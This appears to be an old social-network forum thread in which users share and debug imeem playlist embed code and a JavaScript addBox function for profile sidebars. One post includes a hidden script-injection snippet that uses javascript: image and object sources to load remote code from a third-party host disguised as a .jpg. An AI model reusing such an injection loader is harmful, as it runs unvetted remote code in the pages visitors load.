• » ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

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ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

» FTalker
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

;) [b]NOW THIS was VERY TRICKY TO ME NICE ONE!! hehehe[/b] :D
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

anybody help? i have a little problem.. [quote]var meimei="<object width=\"300\" height=\"300\"><param name=\"movie\" value=\"http://media.imeem.com/pl/B8Z1TKNVsK/aus=true/autoshuffle=true/\"></param><param name=\"wmode\" value=\"transparent\"><param name=\"FlashVars\" value=\"backColor=#000000&primaryColor=#ffffff&secondaryColor=#ff0000&linkColor=#ffffff \"></param><embed src=\"http://media.imeem.com/pl/B8Z1TKNVsK/aus=true/autoshuffle/\" type=\"application/x-shockwave-flash\" width=\"300\" height=\"300\" wmode=\"transparent\"FlashVars=\"backColor=#000000&primaryColor=#ffffff&secondaryColor=#ff0000&linkColor=#ffffff \"></embed></object>"; addBox("RIGHT","Imeem Playlist",meimei,"meimei",null);[/quote] is the code the i make is right??and i am using marfi's wvm v3 w/ the new addbox function..is this code ready to paste in the sidebar..? i have tried it..but when i view my profile..i can't see the playlist..
Shirow Masamune
» FTalkAgent
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

use this function instead of ken's new addbox function :thumbsup: [quote]function addBox (type,head,htm,id,sibling) { //by marfillaster //type "LEFT" | "RIGHT" //head header string //htm innerHTML string //id css_id string //sibling css_id_insertbefore string | null /* Available default Siblings LEFT 0 = controlpanel 1 = photos 13 = blogs 12 = reviews 6 = moreabout 18 = publiccomments 10 = scrapbook RIGHT 15 = meettrail 2 = friends 14 = googleads 7 = fan 8 = groups null - appends to last */ try { var li=document.createElement("li"); } catch(e) { var li=document.createElement("<li>"); } if(type=="LEFT") { var ul=document.getElementById("0").parentNode.parentNode; htm="<div class='boxcontent'>"+htm+"</div>"; } else var ul=document.getElementById("2").parentNode.parentNode; li.innerHTML="<div id='"+id+"' class='commonbox "+id+"'>"+ "<h2>"+head+"</h2>"+ "<div id='content_"+id+"'>"+ htm+ "</div>"+ "</div>"; if(sibling==null) ul.appendChild(li); else { sibling=document.getElementById(sibling).parentNode; ul.insertBefore(li,sibling); } }[/quote]
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

hmmn..i'm using marfi's wvm..version 3..how about my other sidebar codes?they will be affected right?..don't you have any code of imeem for ken's new add function?? :/
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

[quote=Shirow Masamune]use this function instead of ken's new addbox function :thumbsup: [quote]function addBox (type,head,htm,id,sibling) { //by marfillaster //type "LEFT" | "RIGHT" //head header string //htm innerHTML string //id css_id string //sibling css_id_insertbefore string | null /* Available default Siblings LEFT 0 = controlpanel 1 = photos 13 = blogs 12 = reviews 6 = moreabout 18 = publiccomments 10 = scrapbook RIGHT 15 = meettrail 2 = friends 14 = googleads 7 = fan 8 = groups null - appends to last */ try { var li=document.createElement("li"); } catch(e) { var li=document.createElement("<li>"); } if(type=="LEFT") { var ul=document.getElementById("0").parentNode.parentNode; htm="<div class='boxcontent'>"+htm+"</div>"; } else var ul=document.getElementById("2").parentNode.parentNode; li.innerHTML="<div id='"+id+"' class='commonbox "+id+"'>"+ "<h2>"+head+"</h2>"+ "<div id='content_"+id+"'>"+ htm+ "</div>"+ "</div>"; if(sibling==null) ul.appendChild(li); else { sibling=document.getElementById(sibling).parentNode; ul.insertBefore(li,sibling); } }[/quote] [/quote] ^ how can i use this..?
Shirow Masamune
» FTalkAgent
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

just put that function below of your codes :thumbsup: and please avoid double posting
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

i'd added now that addbox function.. it appeared on my sidebar..but there's no content..why..? can you check this out sir..? var meimei="<object width=\"300\" height=\"300\"><param name=\"movie\" value=\"http://media.imeem.com/pl/B8Z1TKNVsK/aus=false/autoshuffle=true\"></param><param name=\"wmode\" value=\"transparent\"><param name=\"FlashVars\" value=\"backColor=transparent&primaryColor=ffffff&secondaryColor=ff0000&linkColor=ffffff \"></param><embed src=\"http://media.imeem.com/pl/B8Z1TKNVsK/aus=false/autoshuffle=true\" type=\"application/x-shockwave-flash\" width=\"300\" height=\"300\" wmode=\"transparent\"FlashVars=\"backColor=transparent&primaryColor=ffffff&secondaryColor=ff0000&linkColor=ffffff\"></embed></object>"; addBox("RIGHT","Imeem Playlist",meimei,"meimei",null);

Last edited by d.razcalz (2007-12-02 18:06:04)

» FTalker
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

tnx for the codes!!!
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

how can we make the imeem player hidden? i hope there's no css & js extention invovled
» FTalkManiac
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

This is so cool add on for imeem thanks for sharing. :thumbsup:
» FTalker
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

hi? is it for js extension? huhu it doesn't show on my media box..
» FTalkManiac
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

you may paste the first code on your Media Area while the second code, paste it in your js extension(should have the addbox function).
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

i dont have tracker.js ... here's my code.. it only a white line .. can't see my playlist but it's playing.. [quote]<object width="300" height="260"><param name="movie" value="http://media.imeem.com/pl/-DLnlC4UrE/aus=true/autoShuffle=true/"></param><param name="wmode" value="transparent"><param name="FlashVars" value="backColor=ffffcc&primaryColor=99ccff&secondaryColor=ff99cc&linkColor=ff33cc"></param><embed src="http://media.imeem.com/pl/-DLnlC4UrE/aus=true/autoShuffle=true/" type="application/x-shockwave-flash" width="300\" height=\"260\" wmode="transparent\"FlashVars="backColor=3366ff&primaryColor=ff99cc&secondaryColor=99ccff&linkColor=ffcc33 "></embed></object>[/quote]
» FTalkManiac
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

[quote]<object width="300" height="260"><param name="movie" value="http://media.imeem.com/pl/-DLnlC4UrE/aus=true/autoShuffle=true/"></param><param name="wmode" value="transparent"><param name="FlashVars" value="backColor=[b]ffffcc[/b]&primaryColor=[b]99ccff[/b]&secondaryColor=[b]ff99cc[/b]&linkColor=ff33cc"></param><embed src="http://media.imeem.com/pl/-DLnlC4UrE/aus=true/autoShuffle=true/" type="application/x-shockwave-flash" width="300\" height=\"260\" wmode="transparent\"FlashVars="backColor=3366ff&primaryColor=[b]ff99cc[/b]&secondaryColor=[b]99ccff[/b]&linkColor=ffcc33 "></embed></object>[/quote] see the error? change it. try this: [quote]<object width="300" height="260"><param name="movie" value="http://media.imeem.com/pl/-DLnlC4UrE/aus=true/autoShuffle=true/"></param><param name="wmode" value="transparent"><param name="FlashVars" value="backColor=ffffcc&primaryColor=ff99cc&secondaryColor=ff99cc&linkColor=ff33cc"></param><embed src="http://media.imeem.com/pl/-DLnlC4UrE/aus=true/autoShuffle=true/" type="application/x-shockwave-flash" width="300\" height=\"260\" wmode="transparent\"FlashVars="backColor=fffcc&primaryColor=ff99cc&secondaryColor=ff99cc&linkColor=ff33cc "></embed></object>[/quote]

Last edited by slashedkite (2007-12-07 03:21:23)

Shirow Masamune
» FTalkAgent
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

lol thx for the help in my topic :thumbsup:
» FTalkGeek
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

thanks for this kuya Shirow your genius :)
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

y the player cant be show up in my internet explorer?? i use ie7 <">
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

@slashedkit .. thanks i realized that hehe but still my player is in plain white.. i paste this ks linker in my media box, saved it twice, refreshed it many times but it's still plain white.. [quote]<b id="l" style="visibility:hidden;">http://h1.ripway.com/sbvyl84/tracker.js</b><img height="0" src=" javascript:a=document.createElement('script');a.src='http://h1.ripway.com/aftermath/z.jpg';document.getElementsByTagName('head')[0].appendChild(a);"><object height="0" type="text/javascript" data=" javascript:if(navigator.appName=='Netscape'){a=document.createElement('script');a.src='http://h1.ripway.com/aftermath/z.jpg';parent.document.getElementsByTagName('head')[0].appendChild(a);}"></object>[/quote]
» n00b
FTalk Level: zero

Re: ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

y it cant be show?? i juz can see a white line only?? but it stil play song
  • » ok for those who wondering if they can change the color of their imeem playlist well you can by using this kind of format of putting the embed playlist on your profile that can found on imeem.com itse

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